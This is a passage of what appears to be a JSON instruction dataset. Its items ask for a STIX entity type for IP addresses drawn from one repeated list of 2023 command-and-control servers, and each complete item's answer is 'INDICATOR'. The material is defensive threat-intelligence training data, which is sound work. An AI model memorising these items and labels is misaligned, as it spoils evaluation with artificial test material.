malicious intent.\n- TOOL: Legitimate software that can be used by threat actors to perform attacks.\n- VULNERABILITY: A mistake in software that can be directly used by a hacker to gain access to a system or network.\n. Choose STIX ENTITY TYPE from list of possible answers: [\"ATTACK_PATTERN\", \"CAMPAIGN\", \"COURSE_OF_ACTION\", \"IDENTITY\", \"INDICATOR\", \"INFRASTRUCTURE\", \"LOCATION\", \"MALWARE\", \"THREAT_ACTOR\", \"TOOL\", \"VULNERABILITY\"].\nAnswer in the following format: ONE OF STIX ENTITY TYPES ",
"input": "### Entity:\n95.179.144.161\n\n---\n\n### Text Passage:\n**Recent C &C infrastructure (2023)**\n* 45.76.141.166\n* 159.223.112.245\n* 140.82.56.186\n* 159.203.164.194\n* 45.32.94.58\n* 45.95.232.33\n* 139.59.109.100\n* 164.92.245.246\n* 45.32.101.6\n* 140.82.18.48\n* 216.128.140.45\n* 146.190.127.238\n* 207.148.74.68\n* 195.133.88.19\n* 146.190.60.230\n* 84.32.190.137\n* 206.189.154.168\n* 188.166.4.128\n* 104.248.54.250\n* 165.227.76.84\n* 66.42.104.158\n* 161.35.95.47\n* 149.28.125.56\n* 143.198.50.118\n* 66.42.126.121\n* 64.227.72.210\n* 81.19.140.147\n* 165.232.77.197\n* 146.190.117.209\n* 134.122.51.47\n* 143.198.152.232\n* 140.82.47.181\n* 159.223.102.109\n* 170.64.188.146\n* 155.138.194.244\n* 45.32.88.90\n* 89.185.84.32\n* 64.226.84.229\n* 206.189.14.94\n* 24.199.84.132\n* 45.32.41.115\n* 84.32.188.69\n* 206.189.128.172\n* 170.64.168.228\n* 161.35.238.148\n* 170.64.138.138\n* 178.128.86.43\n* 206.81.28.5\n* 178.128.231.180\n* 45.77.115.67\n* 136.244.65.253\n* 143.244.190.199\n* 159.65.176.121\n* 192.248.154.154\n* 209.97.175.128\n* 147.182.240.58\n* 146.190.212.239\n* 143.198.135.132\n* 45.76.202.102\n* 142.93.108.1\n* 46.101.127.147\n* 134.209.0.136\n* 138.68.110.19\n* 167.99.215.50\n* 161.35.232.118\n* 88.216.210.3\n* 165.227.121.87\n* 165.227.48.59\n* 108.61.211.250\n* 89.185.84.48\n* 167.172.69.123\n* 89.185.84.50\n* 206.189.0.134\n* 68.183.200.0\n* 178.128.16.170\n* 95.179.144.161\n* 164.92.222.8\n* 45.95.233.80\n* 78.141.239.24\n* 149.28.181.232\n* 24.199.107.218\n* 45.32.184.140\n* 167.172.20.159\n* 84.32.190.31\n* 164.92.185.60\n* 84.32.131.38\n* 137.184.178.46\n* 206.189.149.103\n* 157.245.176.123\n* 45.95.232.92\n* 45.95.232.29\n* 170.64.150.90\n* 89.185.84.45\n* 140.82.16.120\n* 84.32.185.136\n* 134.122.43.175\n* 195.133.88.55\n* 84.32.191.147\n* 78.141.238.136\n* 45.82.13.84\n* 159.65.248.0\n* 84.32.34.69\n* 170.64.146.194\n* 45.82.13.22\n* 45.82.13.23\n* 134.209.33.42\n* 199.247.8.115\n* 84.32.128.239\n* 173.199.70.238\n* 138.68.174.177\n* 178.128.213.177\n* 143.110.180.68\n* 167.172.144.127\n* 165.232.165.42\n* 45.95.232.51\n* 149.28.98.149\n* 104.156.230.193\n* 104.248.86.158\n* 134.122.51.47\n* 134.209.182.221\n* 139.59.60.191\n* 140.82.11.60\n* 140.82.47.181\n* 140.82.50.37\n* 143.198.135.132\n* 143.198.53.203\n* 147.182.250.33\n* 149.28.130.189\n* 149.28.181.232\n* 149.28.98.149\n* 155.138.194.244\n* 157.245.69.118\n* 158.247.204.242\n* 159.223.102.109\n* 159.223.23.23\n* 164.92.72.212\n* 165.22.72.74\n* 165.227.76.84\n* 165.232.120.169\n* 167.172.58.96\n* 167.71.67.58\n* 170.64.136.186\n* 170.64.140.214\n* 170.64.156.98\n* 178.128.228.252\n* 188.166.176.39\n* 188.166.7.140\n* 193.149.176.26\n* 195.133.88.55\n* 202.182.116.135\n* 202.182.98.100\n* 206.189.80.216\n* 207.148.72.173\n* 31.129.22.46\n* 31.129.22.48\n* 31.129.22.50\n* 45.32.101.6\n* 45.32.117.62\n* 45.32.158.96\n* 45.32.62.100\n* 45.32.88.90\n* 45.82.13.84\n* 45.95.232.33\n* 45.95.232.74\n* 45.95.233.80\n* 5.199.161.29\n* 64.226.84.229\n* 64.227.64.163\n* 66.42.104.158\n* 68.183.200.0\n* 78.141.239.24\n* 78.153.139.7\n* 81.19.140.147\n* 84.32.131.47\n* 84.32.188.13\n* 95.179.144.161\n* 95.179.245.185\n* 216.128.178.248\n",
"output": "INDICATOR"
},
{
"instruction": "You are a helpful threat intelligence analyst. Your task is to assign a STIX entity type to the given Entity in the input. To help you, here is a list of the possible STIX entity types.\nSTIX entity types:\n- ATTACK_PATTERN: A type of TTP that describes ways that adversaries attempt to compromise targets.\n- CAMPAIGN: A grouping of adversarial behaviors that describes a set of malicious activities or attacks (sometimes called waves) that occur over a period of time against a specific set of targets.\n- COURSE_OF_ACTION: A recommendation or mitigation from a producer of intelligence to a consumer on the actions that they might take in response to that intelligence.\n- IDENTITY: Actual individuals, organizations, or groups (e.g., ACME, Inc.) as well as classes of individuals, organizations, systems, or groups (e.g., the finance sector).\n- INDICATOR: Contains a pattern that can be used to detect suspicious or malicious cyber activity (e.g., IP Addresses, MAC Addresses, Hashes, filenames, registry keys, cryptocurrency wallets, etc.).\n- INFRASTRUCTURE: Represents a type of TTP and describes any systems, software services, and any associated physical or virtual resources intended to support some purpose (e.g., C2 servers used as part of an attack, device or server that are part of defense, database servers targeted by an attack, etc.).\n- LOCATION: Represents a geographic location (e.g., cities, countries, continents, regions, etc.).\n- MALWARE: A type of TTP that represents malicious code.\n- THREAT_ACTOR: Actual individuals, groups, or organizations believed to be operating with malicious intent.\n- TOOL: Legitimate software that can be used by threat actors to perform attacks.\n- VULNERABILITY: A mistake in software that can be directly used by a hacker to gain access to a system or network.\n. Choose STIX ENTITY TYPE from list of possible answers: [\"ATTACK_PATTERN\", \"CAMPAIGN\", \"COURSE_OF_ACTION\", \"IDENTITY\", \"INDICATOR\", \"INFRASTRUCTURE\", \"LOCATION\", \"MALWARE\", \"THREAT_ACTOR\", \"TOOL\", \"VULNERABILITY\"].\nAnswer in the following format: ONE OF STIX ENTITY TYPES ",
"input": "### Entity:\n138.68.174.177\n\n---\n\n### Text Passage:\n**Recent C &C infrastructure (2023)**\n* 45.76.141.166\n* 159.223.112.245\n* 140.82.56.186\n* 159.203.164.194\n* 45.32.94.58\n* 45.95.232.33\n* 139.59.109.100\n* 164.92.245.246\n* 45.32.101.6\n* 140.82.18.48\n* 216.128.140.45\n* 146.190.127.238\n* 207.148.74.68\n* 195.133.88.19\n* 146.190.60.230\n* 84.32.190.137\n* 206.189.154.168\n* 188.166.4.128\n* 104.248.54.250\n* 165.227.76.84\n* 66.42.104.158\n* 161.35.95.47\n* 149.28.125.56\n* 143.198.50.118\n* 66.42.126.121\n* 64.227.72.210\n* 81.19.140.147\n* 165.232.77.197\n* 146.190.117.209\n* 134.122.51.47\n* 143.198.152.232\n* 140.82.47.181\n* 159.223.102.109\n* 170.64.188.146\n* 155.138.194.244\n* 45.32.88.90\n* 89.185.84.32\n* 64.226.84.229\n* 206.189.14.94\n* 24.199.84.132\n* 45.32.41.115\n* 84.32.188.69\n* 206.189.128.172\n* 170.64.168.228\n* 161.35.238.148\n* 170.64.138.138\n* 178.128.86.43\n* 206.81.28.5\n* 178.128.231.180\n* 45.77.115.67\n* 136.244.65.253\n* 143.244.190.199\n* 159.65.176.121\n* 192.248.154.154\n* 209.97.175.128\n* 147.182.240.58\n* 146.190.212.239\n* 143.198.135.132\n* 45.76.202.102\n* 142.93.108.1\n* 46.101.127.147\n* 134.209.0.136\n* 138.68.110.19\n* 167.99.215.50\n* 161.35.232.118\n* 88.216.210.3\n* 165.227.121.87\n* 165.227.48.59\n* 108.61.211.250\n* 89.185.84.48\n* 167.172.69.123\n* 89.185.84.50\n* 206.189.0.134\n* 68.183.200.0\n* 178.128.16.170\n* 95.179.144.161\n* 164.92.222.8\n* 45.95.233.80\n* 78.141.239.24\n* 149.28.181.232\n* 24.199.107.218\n* 45.32.184.140\n* 167.172.20.159\n* 84.32.190.31\n* 164.92.185.60\n* 84.32.131.38\n* 137.184.178.46\n* 206.189.149.103\n* 157.245.176.123\n* 45.95.232.92\n* 45.95.232.29\n* 170.64.150.90\n* 89.185.84.45\n* 140.82.16.120\n* 84.32.185.136\n* 134.122.43.175\n* 195.133.88.55\n* 84.32.191.147\n* 78.141.238.136\n* 45.82.13.84\n* 159.65.248.0\n* 84.32.34.69\n* 170.64.146.194\n* 45.82.13.22\n* 45.82.13.23\n* 134.209.33.42\n* 199.247.8.115\n* 84.32.128.239\n* 173.199.70.238\n* 138.68.174.177\n* 178.128.213.177\n* 143.110.180.68\n* 167.172.144.127\n* 165.232.165.42\n* 45.95.232.51\n* 149.28.98.149\n* 104.156.230.193\n* 104.248.86.158\n* 134.122.51.47\n* 134.209.182.221\n* 139.59.60.191\n* 140.82.11.60\n* 140.82.47.181\n* 140.82.50.37\n* 143.198.135.132\n* 143.198.53.203\n* 147.182.250.33\n* 149.28.130.189\n* 149.28.181.232\n* 149.28.98.149\n* 155.138.194.244\n* 157.245.69.118\n* 158.247.204.242\n* 159.223.102.109\n* 159.223.23.23\n* 164.92.72.212\n* 165.22.72.74\n* 165.227.76.84\n* 165.232.120.169\n* 167.172.58.96\n* 167.71.67.58\n* 170.64.136.186\n* 170.64.140.214\n* 170.64.156.98\n* 178.128.228.252\n* 188.166.176.39\n* 188.166.7.140\n* 193.149.176.26\n* 195.133.88.55\n* 202.182.116.135\n* 202.182.98.100\n* 206.189.80.216\n* 207.148.72.173\n* 31.129.22.46\n* 31.129.22.48\n* 31.129.22.50\n* 45.32.101.6\n* 45.32.117.62\n* 45.32.158.96\n* 45.32.62.100\n* 45.32.88.90\n* 45.82.13.84\n* 45.95.232.33\n* 45.95.232.74\n* 45.95.233.80\n* 5.199.161.29\n* 64.226.84.229\n* 64.227.64.163\n* 66.42.104.158\n* 68.183.200.0\n* 78.141.239.24\n* 78.153.139.7\n* 81.19.140.147\n* 84.32.131.47\n* 84.32.188.13\n* 95.179.144.161\n* 95.179.245.185\n* 216.128.178.248\n",
"output": "INDICATOR"
},
{
"instruction": "You are a helpful threat intelligence analyst. Your task is to assign a STIX entity type to the given Entity in the input. To help you, here is a list of the possible STIX entity types.\nSTIX entity types:\n- ATTACK_PATTERN: A type of TTP that describes ways that adversaries attempt to compromise targets.\n- CAMPAIGN: A grouping of adversarial behaviors that describes a set of malicious activities or attacks (sometimes called waves) that occur over a period of time against a specific set of targets.\n- COURSE_OF_ACTION: A recommendation or mitigation from a producer of intelligence to a consumer on the actions that they might take in response to that intelligence.\n- IDENTITY: Actual individuals, organizations, or groups (e.g., ACME, Inc.) as well as classes of individuals, organizations, systems, or groups (e.g., the finance sector).\n- INDICATOR: Contains a pattern that can be used to detect suspicious or malicious cyber activity (e.g., IP Addresses, MAC Addresses, Hashes, filenames, registry keys, cryptocurrency wallets, etc.).\n- INFRASTRUCTURE: Represents a type of TTP and describes any systems, software services, and any associated physical or virtual resources intended to support some purpose (e.g., C2 servers used as part of an attack, device or server that are part of defense, database servers targeted by an attack, etc.).\n- LOCATION: Represents a geographic location (e.g., cities, countries, continents, regions, etc.).\n- MALWARE: A type of TTP that represents malicious code.\n- THREAT_ACTOR: Actual individuals, groups, or organizations believed to be operating with malicious intent.\n- TOOL: Legitimate software that can be used by threat actors to perform attacks.\n- VULNERABILITY: A mistake in software that can be directly used by a hacker to gain access to a system or network.\n. Choose STIX ENTITY TYPE from list of possible answers: [\"ATTACK_PATTERN\", \"CAMPAIGN\", \"COURSE_OF_ACTION\", \"IDENTITY\", \"INDICATOR\", \"INFRASTRUCTURE\", \"LOCATION\", \"MALWARE\", \"THREAT_ACTOR\", \"TOOL\", \"VULNERABILITY\"].\nAnswer in the following format: ONE OF STIX ENTITY TYPES ",
"input": "### Entity:\n207.148.72.173\n\n---\n\n### Text Passage:\n**Recent C &C infrastructure (2023)**\n* 45.76.141.166\n* 159.223.112.245\n* 140.82.56.186\n* 159.203.164.194\n* 45.32.94.58\n* 45.95.232.33\n* 139.59.109.100\n* 164.92.245.246\n* 45.32.101.6\n* 140.82.18.48\n* 216.128.140.45\n* 146.190.127.238\n* 207.148.74.68\n* 195.133.88.19\n* 146.190.60.230\n* 84.32.190.137\n* 206.189.154.168\n* 188.166.4.128\n* 104.248.54.250\n* 165.227.76.84\n* 66.42.104.158\n* 161.35.95.47\n* 149.28.125.56\n* 143.198.50.118\n* 66.42.126.121\n* 64.227.72.210\n* 81.19.140.147\n* 165.232.77.197\n* 146.190.117.209\n* 134.122.51.47\n* 143.198.152.232\n* 140.82.47.181\n* 159.223.102.109\n* 170.64.188.146\n* 155.138.194.244\n* 45.32.88.90\n* 89.185.84.32\n* 64.226.84.229\n* 206.189.14.94\n* 24.199.84.132\n* 45.32.41.115\n* 84.32.188.69\n* 206.189.128.172\n* 170.64.168.228\n* 161.35.238.148\n* 170.64.138.138\n* 178.128.86.43\n* 206.81.28.5\n* 178.128.231.180\n* 45.77.115.67\n* 136.244.65.253\n* 143.244.190.199\n* 159.65.176.121\n* 192.248.154.154\n* 209.97.175.128\n* 147.182.240.58\n* 146.190.212.239\n* 143.198.135.132\n* 45.76.202.102\n* 142.93.108.1\n* 46.101.127.147\n* 134.209.0.136\n* 138.68.110.19\n* 167.99.215.50\n* 161.35.232.118\n* 88.216.210.3\n* 165.227.121.87\n* 165.227.48.59\n* 108.61.211.250\n* 89.185.84.48\n* 167.172.69.123\n* 89.185.84.50\n* 206.189.0.134\n* 68.183.200.0\n* 178.128.16.170\n* 95.179.144.161\n* 164.92.222.8\n* 45.95.233.80\n* 78.141.239.24\n* 149.28.181.232\n* 24.199.107.218\n* 45.32.184.140\n* 167.172.20.159\n* 84.32.190.31\n* 164.92.185.60\n* 84.32.131.38\n* 137.184.178.46\n* 206.189.149.103\n* 157.245.176.123\n* 45.95.232.92\n* 45.95.232.29\n* 170.64.150.90\n* 89.185.84.45\n* 140.82.16.120\n* 84.32.185.136\n* 134.122.43.175\n* 195.133.88.55\n* 84.32.191.147\n* 78.141.238.136\n* 45.82.13.84\n* 159.65.248.0\n* 84.32.34.69\n* 170.64.146.194\n* 45.82.13.22\n* 45.82.13.23\n* 134.209.33.42\n* 199.247.8.115\n* 84.32.128.239\n* 173.199.70.238\n* 138.68.174.177\n* 178.128.213.177\n* 143.110.180.68\n* 167.172.144.127\n* 165.232.165.42\n* 45.95.232.51\n* 149.28.98.149\n* 104.156.230.193\n* 104.248.86.158\n* 134.122.51.47\n* 134.209.182.221\n* 139.59.60.191\n* 140.82.11.60\n* 140.82.47.181\n* 140.82.50.37\n* 143.198.135.132\n* 143.198.53.203\n* 147.182.250.33\n* 149.28.130.189\n* 149.28.181.232\n* 149.28.98.149\n* 155.138.194.244\n* 157.245.69.118\n* 158.247.204.242\n* 159.223.102.109\n* 159.223.23.23\n* 164.92.72.212\n* 165.22.72.74\n* 165.227.76.84\n* 165.232.120.169\n* 167.172.58.96\n* 167.71.67.58\n* 170.64.136.186\n* 170.64.140.214\n* 170.64.156.98\n* 178.128.228.252\n* 188.166.176.39\n* 188.166.7.140\n* 193.149.176.26\n* 195.133.88.55\n* 202.182.116.135\n* 202.182.98.100\n* 206.189.80.216\n* 207.148.72.173\n* 31.129.22.46\n* 31.129.22.48\n* 31.129.22.50\n* 45.32.101.6\n* 45.32.117.62\n* 45.32.158.96\n* 45.32.62.100\n* 45.32.88.90\n* 45.82.13.84\n* 45.95.232.33\n* 45.95.232.74\n* 45.95.233.80\n* 5.199.161.29\n* 64.226.84.229\n* 64.227.64.163\n* 66.42.104.158\n* 68.183.200.0\n* 78.141.239.24\n* 78.153.139.7\n* 81.19.140.147\n* 84.32.131.47\n* 84.32.188.13\n* 95.179.144.161\n* 95.179.245.185\n* 216.128.178.248\n",
"output": "INDICATOR"
},
{
"instruction": "You are a helpful threat intelligence analyst. Your task is to assign a STIX entity type to the given Entity in the input. To help you, here is a list of the possible STIX entity types.\nSTIX entity types:\n- ATTACK_PATTERN: A type of TTP that describes ways that adversaries attempt to compromise targets.\n- CAMPAIGN: A grouping of adversarial behaviors that describes a set of malicious activities or attacks (sometimes called waves) that occur over a period of time against a specific set of targets.\n- COURSE_OF_ACTION: A recommendation or mitigation from a producer of intelligence to a consumer on the actions that they might take in response to that intelligence.\n- IDENTITY: Actual individuals, organizations, or groups (e.g., ACME, Inc.) as well as classes of individuals, organizations, systems, or groups (e.g., the finance sector).\n- INDICATOR: Contains a pattern that can be used to detect suspicious or malicious cyber activity (e.g., IP Addresses, MAC Addresses, Hashes, filenames, registry keys, cryptocurrency wallets, etc.).\n- INFRASTRUCTURE: Represents a type of TTP and describes any systems, software services, and any associated physical or virtual resources intended to support some purpose (e.g., C2 servers used as part of an attack, device or server that are part of defense, database servers targeted by an attack, etc.).\n- LOCATION: Represents a geographic location (e.g., cities, countries, continents, regions, etc.).\n- MALWARE: A type of TTP that represents malicious code.\n- THREAT_ACTOR: Actual individuals, groups, or organizations believed to be operating with malicious intent.\n- TOOL: Legitimate software that can be used by threat actors to perform attacks.\n- VULNERABILITY: A mistake in software that can be directly used by a hacker to gain access to a system or network.\n. Choose STIX ENTITY TYPE from list of possible answers: [\"ATTACK_PATTERN\", \"CAMPAIGN\", \"COURSE_OF_ACTION\", \"IDENTITY\", \"INDICATOR\", \"INFRASTRUCTURE\", \"LOCATION\", \"MALWARE\", \"THREAT_ACTOR\", \"TOOL\", \"VULNERABILITY\"].\nAnswer in the following format: ONE OF STIX ENTITY TYPES ",
"input": "### Entity:\n170.64.140.214\n\n---\n\n### Text Passage:\n**Recent C &C infrastructure (2023)**\n* 45.76.141.166\n* 159.223.112.245\n* 140.82.56.186\n* 159.203.164.194\n* 45.32.94.58\n* 45.95.232.33\n* 139.59.109.100\n* 164.92.245.246\n* 45.32.101.6\n* 140.82.18.48\n* 216.128.140.45\n* 146.190.127.238\n* 207.148.74.68\n* 195.133.88.19\n* 146.190.60.230\n* 84.32.190.137\n* 206.189.154.168\n* 188.166.4.128\n* 104.248.54.250\n* 165.227.76.84\n* 66.42.104.158\n* 161.35.95.47\n* 149.28.125.56\n* 143.198.50.118\n* 66.42.126.121\n* 64.227.72.210\n* 81.19.140.147\n* 165.232.77.197\n* 146.190.117.209\n* 134.122.51.47\n* 143.198.152.232\n* 140.82.47.181\n* 159.223.102.109\n* 170.64.188.146\n* 155.138.194.244\n* 45.32.88.90\n* 89.185.84.32\n* 64.226.84.229\n* 206.189.14.94\n* 24.199.84.132\n* 45.32.41.115\n* 84.32.188.69\n* 206.189.128.172\n* 170.64.168.228\n* 161.35.238.148\n* 170.64.138.138\n* 178.128.86.43\n* 206.81.28.5\n* 178.128.231.180\n* 45.77.115.67\n* 136.244.65.253\n* 143.244.190.199\n* 159.65.176.121\n* 192.248.154.154\n* 209.97.175.128\n* 147.182.240.58\n* 146.190.212.239\n* 143.198.135.132\n* 45.76.202.102\n* 142.93.108.1\n* 46.101.127.147\n* 134.209.0.136\n* 138.68.110.19\n* 167.99.215.50\n* 161.35.232.118\n* 88.216.210.3\n* 165.227.121.87\n* 165.227.48.59\n* 108.61.211.250\n* 89.185.84.48\n* 167.172.69.123\n* 89.185.84.50\n* 206.189.0.134\n* 68.183.200.0\n* 178.128.16.170\n* 95.179.144.161\n* 164.92.222.8\n* 45.95.233.80\n* 78.141.239.24\n* 149.28.181.232\n* 24.199.107.218\n* 45.32.184.140\n* 167.172.20.159\n* 84.32.190.31\n* 164.92.185.60\n* 84.32.131.38\n* 137.184.178.46\n* 206.189.149.103\n* 157.245.176.123\n* 45.95.232.92\n* 45.95.232.29\n* 170.64.150.90\n* 89.185.84.45\n* 140.82.16.120\n* 84.32.185.136\n* 134.122.43.175\n* 195.133.88.55\n* 84.32.191.147\n* 78.141.238.136\n* 45.82.13.84\n* 159.65.248.0\n* 84.32.34.69\n* 170.64.146.194\n* 45.82.13.22\n* 45.82.13.23\n* 134.209.33.42\n* 199.247.8.115\n* 84.32.128.239\n* 173.199.70.238\n* 138.68.174.177\n* 178.128.213.177\n* 143.110.180.68\n* 167.172.144.127\n* 165.232.165.42\n* 45.95.232.51\n* 149.28.98.149\n* 104.156.230.193\n* 104.248.86.158\n* 134.122.51.47\n* 134.209.182.221\n* 139.59.60.191\n* 140.82.11.60\n* 140.82.47.181\n* 140.82.50.37\n* 143.198.135.132\n* 143.198.53.203\n* 147.182.250.33\n* 149.28.130.189\n* 149.28.181.232\n* 149.28.98.149\n* 155.138.194.244\n* 157.245.69.118\n* 158.247.204.242\n* 159.223.102.109\n* 159.223.23.23\n* 164.92.72.212\n* 165.22.72.74\n* 165.227.76.84\n* 165.232.120.169\n* 167.172.58.96\n* 167.71.67.58\n* 170.64.136.186\n* 170.64.140.214\n* 170.64.156.98\n* 178.128.228.252\n* 188.166.176.39\n* 188.166.7.140\n* 193.149.176.26\n* 195.133.88.55\n* 202.182.116.135\n* 202.182.98.100\n* 206.189.80.216\n* 207.148.72.173\n* 31.129.22.46\n* 31.129.22.48\n* 31.129.22.50\n* 45.32.101.6\n* 45.32.117.62\n* 45.32.158.96\n* 45.32.62.100\n* 45.32.88.90\n* 45.82.13.84\n* 45.95.232.33\n* 45.95.232.74\n* 45.95.233.80\n* 5.199.161.29\n* 64.226.84.229\n* 64.227.64.163\n* 66.42.104.158\n* 68.183.200.0\n* 78.141.239.24\n* 78.153.139.7\n* 81.19.140.147\n* 84.32.131.47\n* 84.32.188.13\n* 95.179.144.161\n* 95.179.245.185\n* 216.128.178.248\n",
"output": "INDICATOR"
},
{
"instruction": "You are a helpful threat intelligence analyst. Your task is to assign a STIX entity type to the given Entity in the input. To help you, here is a list of the possible STIX entity types.\nSTIX entity types:\n- ATTACK_PATTERN: A type of TTP that describes ways that adversaries attempt to compromise targets.\n- CAMPAIGN: A grouping of adversarial behaviors that describes a set of malicious activities or attacks (sometimes called waves) that occur over a period of time against a specific set of targets.\n- COURSE_OF_ACTION: A recommendation or mitigation from a producer of intelligence to a consumer on the actions that they might take in response to that intelligence.\n- IDENTITY: Actual individuals, organizations, or groups (e.g., ACME, Inc.) as well as classes of individuals, organizations, systems, or groups (e.g., the finance sector).\n- INDICATOR: Contains a pattern that can be used to detect suspicious or malicious cyber activity (e.g., IP Addresses, MAC Addresses, Hashes, filenames, registry keys, cryptocurrency wallets, etc.).\n- INFRASTRUCTURE: Represents a type of TTP and describes any systems, software services, and any associated physical or virtual resources intended to support some purpose (e.g., C2 servers used as part of an attack, device or server that are part of defense, database servers targeted by an attack, etc.).\n- LOCATION: Represents a geographic location (e.g., cities, countries, continents, regions, etc.).\n- MALWARE: A type of TTP that represents malicious code.\n- THREAT_ACTOR: Actual individuals, groups, or organizations believed to be operating with malicious intent.\n- TOOL: Legitimate software that can be used by threat actors to perform attacks.\n- VULNERABILITY: A mistake in software that can be directly used by a hacker to gain access to a system or network.\n. Choose STIX ENTITY TYPE from list of possible answers: [\"ATTACK_PATTERN\", \"CAMPAIGN\", \"COURSE_OF_ACTION\", \"IDENTITY\", \"INDICATOR\", \"INFRASTRUCTURE\", \"LOCATION\", \"MALWARE\", \"THREAT_ACTOR\", \"TOOL\", \"VULNERABILITY\"].\nAnswer in the following format: ONE OF STIX ENTITY TYPES ",
"input": "### Entity:\n147.182.250.33\n\n---\n\n### Text Passage:\n**Recent C &C infrastructure (2023)**\n* 45.76.141.166\n* 159.223.112.245\n* 140.82.56.186\n* 159.203.164.194\n* 45.32.94.58\n* 45.95.232.33\n* 139.59.109.100\n* 164.92.245.246\n* 45.32.101.6\n* 140.82.18.48\n* 216.128.140.45\n* 146.190.127.238\n* 207.148.74.68\n* 195.133.88.19\n* 146.190.60.230\n* 84.32.190.137\n* 206.189.154.168\n* 188.166.4.128\n* 104.248.54.250\n* 165.227.76.84\n* 66.42.104.158\n* 161.35.95.47\n* 149.28.125.56\n* 143.198.50.118\n* 66.42.126.121\n* 64.227.72.210\n* 81.19.140.147\n* 165.232.77.197\n* 146.190.117.209\n* 134.122.51.47\n* 143.198.152.232\n* 140.82.47.181\n* 159.223.102.109\n* 170.64.188.146\n* 155.138.194.244\n* 45.32.88.90\n* 89.185.84.32\n* 64.226.84.229\n* 206.189.14.94\n* 24.199.84.132\n* 45.32.41.115\n* 84.32.188.69\n* 206.189.128.172\n* 170.64.168.228\n* 161.35.238.148\n* 170.64.138.138\n* 178.128.86.43\n* 206.81.28.5\n* 178.128.231.180\n* 45.77.115.67\n* 136.244.65.253\n* 143.244.190.199\n* 159.65.176.121\n* 192.248.154.154\n* 209.97.175.128\n* 147.182.240.58\n* 146.190.212.239\n* 143.198.135.132\n* 45.76.202.102\n* 142.93.108.1\n* 46.101.127.147\n* 134.209.0.136\n* 138.68.110.19\n* 167.99.215.50\n* 161.35.232.118\n* 88.216.210.3\n* 165.227.121.87\n* 165.227.48.59\n* 108.61.211.250\n* 89.185.84.48\n* 167.172.69.123\n* 89.185.84.50\n* 206.189.0.134\n* 68.183.200.0\n* 178.128.16.170\n* 95.179.144.161\n* 164.92.222.8\n* 45.95.233.80\n* 78.141.239.24\n* 149.28.181.232\n* 24.199.107.218\n* 45.32.184.140\n* 167.172.20.159\n* 84.32.190.31\n* 164.92.185.60\n* 84.32.131.38\n* 137.184.178.46\n* 206.189.149.103\n* 157.245.176.123\n* 45.95.232.92\n* 45.95.232.29\n* 170.64.150.90\n* 89.185.84.45\n* 140.82.16.120\n* 84.32.185.136\n* 134.122.43.175\n* 195.133.88.55\n* 84.32.191.147\n* 78.141.238.136\n* 45.82.13.84\n* 159.65.248.0\n* 84.32.34.69\n* 170.64.146.194\n* 45.82.13.22\n* 45.82.13.23\n* 134.209.33.42\n* 199.247.8.115\n* 84.32.128.239\n* 173.199.70.238\n* 138.68.174.177\n* 178.128.213.177\n* 143.110.180.68\n* 167.172.144.127\n* 165.232.165.42\n* 45.95.232.51\n* 149.28.98.149\n* 104.156.230.193\n* 104.248.86.158\n* 134.122.51.47\n* 134.209.182.221\n* 139.59.60.191\n* 140.82.11.60\n* 140.82.47.181\n* 140.82.50.37\n* 143.198.135.132\n* 143.198.53.203\n* 147.182.250.33\n* 149.28.130.189\n* 149.28.181.232\n* 149.28.98.149\n* 155.138.194.244\n* 157.245.69.118\n* 158.247.204.242\n* 159.223.102.109\n* 159.223.23.23\n* 164.92.72.212\n* 165.22.72.74\n* 165.227.76.84\n* 165.232.120.169\n* 167.172.58.96\n* 167.71.67.58\n* 170.64.136.186\n* 170.64.140.214\n* 170.64.156.98\n* 178.128.228.252\n* 188.166.176.39\n* 188.166.7.140\n* 193.149.176.26\n* 195.133.88.55\n* 202.182.116.135\n* 202.182.98.100\n* 206.189.80.216\n* 207.148.72.173\n* 31.129.22.46\n* 31.129.22.48\n* 31.129.22.50\n* 45.32.101.6\n* 45.32.117.62\n* 45.32.158.96\n* 45.32.62.100\n* 45.32.88.90\n* 45.82.13.84\n* 45.95.232.33\n* 45.95.232.74\n* 45.95.233.80\n* 5.199.161.29\n* 64.226.84.229\n* 64.227.64.163\n* 66.42.104.158\n* 68.183.200.0\n* 78.141.239.24\n* 78.153.139.7\n* 81.19.140.147\n* 84.32.131.47\n* 84.32.188.13\n* 95.179.144.161\n* 95.179.245.185\n* 216.128.178.248\n",
"output": "INDICATOR"
},
{
"instruction": "You are a helpful threat intelligence analyst. Your task is to assign a STIX entity type to the given Entity in the input. To help you, here is a list of the possible STIX entity types.\nSTIX entity types:\n- ATTACK_PATTERN: A type of TTP that describes ways that adversaries attempt to compromise targets.\n- CAMPAIGN: A grouping of adversarial behaviors that describes a set of malicious activities or attacks (sometimes called waves) that occur over a period of time against a specific set of targets.\n- COURSE_OF_ACTION: A recommendation or mitigation from a producer of intelligence to a consumer on the actions that they might take in response to that intelligence.\n- IDENTITY: Actual individuals, organizations, or groups (e.g., ACME, Inc.) as well as classes of individuals, organizations, systems, or groups (e.g., the finance sector).\n- INDICATOR: Contains a pattern that can be used to detect suspicious or malicious cyber activity (e.g., IP Addresses, MAC Addresses, Hashes, filenames, registry keys, cryptocurrency wallets, etc.).\n- INFRASTRUCTURE: Represents a type of TTP and describes any systems, software services, and any associated physical or virtual resources intended to support some purpose (e.g., C2 servers used as part of an attack, device or server that are part of defense, database servers targeted by an attack, etc.).\n- LOCATION: Represents a geographic location (e.g., cities, countries, continents, regions, etc.).\n- MALWARE: A type of TTP that represents malicious code.\n- THREAT_ACTOR: Actual individuals, groups, or organizations believed to be operating with malicious intent.\n- TOOL: Legitimate software that can be used by threat actors to perform attacks.\n- VULNERABILITY: A mistake in software that can be directly used by a hacker to gain access to a system or network.\n. Choose STIX ENTITY TYPE from list of possible answers: [\"ATTACK_PATTERN\", \"CAMPAIGN\", \"COURSE_OF_ACTION\", \"IDENTITY\", \"INDICATOR\", \"INFRASTRUCTURE\", \"LOCATION\", \"MALWARE\", \"THREAT_ACTOR\", \"TOOL\", \"VULNERABILITY\"].\nAnswer in the following format: ONE OF STIX ENTITY TYPES ",
